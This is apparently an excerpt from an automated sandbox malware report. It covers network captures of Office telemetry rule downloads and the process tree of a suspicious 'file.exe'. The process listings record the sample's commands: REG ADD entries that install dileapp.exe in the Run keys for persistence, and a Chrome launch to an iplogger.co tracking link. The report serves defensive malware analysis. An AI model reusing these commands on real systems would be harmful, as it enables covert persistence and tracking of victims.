2024-11-30 11:49:04 UTC	192	OUT	GET /rules/rule700901v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:05 GMT Content-Type: text/xml Content-Length: 1408 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1038EF2" x-ms-request-id: 1e770d35-001e-0082-170b-415880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114905Z-174f7845968kdththC1EWRzvxn0000000ds0000000004wge x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:05 UTC	1408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49898	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:04 UTC	192	OUT	GET /rules/rule700900v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:05 GMT Content-Type: text/xml Content-Length: 1371 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT ETag: "0x8DC582BED3D048D" x-ms-request-id: 5d24e825-001e-0046-608f-3fda4b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114905Z-174f7845968kvnqxhC1EWRmf3g0000000n8g000000001xwm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:05 UTC	1371	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	49899	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:49:04 UTC	192	OUT	GET /rules/rule702251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:49:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:49:05 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE0F427E7" x-ms-request-id: 951ad049-201e-0085-3091-3f34e3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114905Z-174f78459688l8rvhC1EWRtzr00000000e2g0000000014ea x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:49:05 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="

Target ID:	0
Start time:	06:46:58
Start date:	30/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x870000
File size:	4'963'581 bytes
MD5 hash:	B9657F229C7591F44DBEF1BFB5C2BE01
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	06:46:59
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	06:46:59
Start date:	30/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	06:46:59
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
Imagebase:	0x80000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	06:46:59
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
Imagebase:	0x80000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	06:47:04
Start date:	30/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	7
Start time:	06:47:05
Start date:	30/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1980,i,4637800445937414229,16644580557611955956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false